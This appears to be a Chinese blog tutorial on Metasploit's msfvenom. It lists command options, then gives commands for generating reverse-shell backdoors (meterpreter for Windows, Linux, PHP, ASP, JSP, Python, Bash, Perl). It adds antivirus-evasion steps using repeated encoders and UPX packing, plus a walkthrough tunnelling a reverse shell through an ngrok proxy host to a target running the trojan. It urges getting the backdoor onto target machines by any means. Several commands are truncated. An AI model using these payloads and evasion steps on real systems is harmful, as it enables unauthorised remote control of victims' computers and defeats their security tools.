msfvenom命令行选项如下:
英文原版:
中文版:
Options:
-p, --payload
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled
-f, --format
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch
-s, --space
-b, --bad-chars 设定规避字符集,比如: '\x00\xff'
-i, --iterations
-c, --add-code
-x, --template
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项
-o, --out
-v, --var-name
--shellest 最小化生成payload
-h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表
这里举出一些利用msfvenom生成shell的命令:
Linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=
Python:
msfvenom -p cmd/unix/reverse_python LHOST=
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=
以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的ip
下面来探究一下如何免杀:
1.可以尝试多重编码:
msfvenom -p windows/meterpreter/reverse_tcp lhost=
这里使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码20次,接着来10次的alpha_upper编码,再来10次的countdown编码,最后才生成以calc.exe为模板的可执行文件。
2.对上述生成的木马进行upx加壳
upx shell.exe
不过现在的杀毒软件越来越nb,一般免杀也已经不好过…
于12.23日更新:
推荐一本书<
主要介绍的是Metasploit下名为shell_reverse_tcp的Payload,利用这个模块可以创建具有Meterpreter功能的各版本的Shellcode,例如比较常见的Asp,Aspx,msi,vbs,war等等
下面以Aspx为例:
1
2
3
4
5
6
show payloads
use windows/shell_reverse_tcp
info
set
lhost 192.168.0.133
set
lport 4444
save
接着输入generate -h 查看帮助:
各版本ShellCode的命令如下:
generate -t asp //生成Asp版的ShellCode generate -t aspx //生成Aspx版的ShellCode
把生成的木马放在c:/inetpub/wwwroot下,访问。同时在msf中设置监听:
1
2
3
4
5
use exploit/multi/handler
set
payload windows/meterpreter/reverse_tcp
set
lhost 192.168.0.133
set
lport 4444
run
----------------------------------------------
2019.10.15补充:
parrot使用ngrok+msfvenom穿透反弹shell
攻击机parrot ip:192.168.127.131
目标机器windows ip :192.168.43.27
首先两台机器不在一个网端,自然是无法ping通:
这里模仿目标机器在公网
攻击机器在内网,攻击机器怎样通过ngrok代理来接受弹回来的shell
1.在ngrok官网注册账号,并开通免费账号
官网地址:http://www.ngrok.cc
创建成功后:
2.下载ngrok客户端
https://www.ngrok.cc/download.html
我这里使用的是parrot。所以选择linux版本
文件解压后得到:sunny
3.启动sunny,开启转发
./sunny clientid 隧道id
4.配置木马来反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=14001 -f exe -o ./test.exe
其中LHOST,LPORT均为ngrok代理服务器地址与端口
5.攻击机本地msf监听
use exploit/multi/handle set payload windows/meterpreter/reverse_tcp set lhost 192.168.127.131 set lport 9876 run
6.目标机器执行木马
可以看到,shell已经反弹成功
手机扫一扫
移动阅读更方便
你可能感兴趣的文章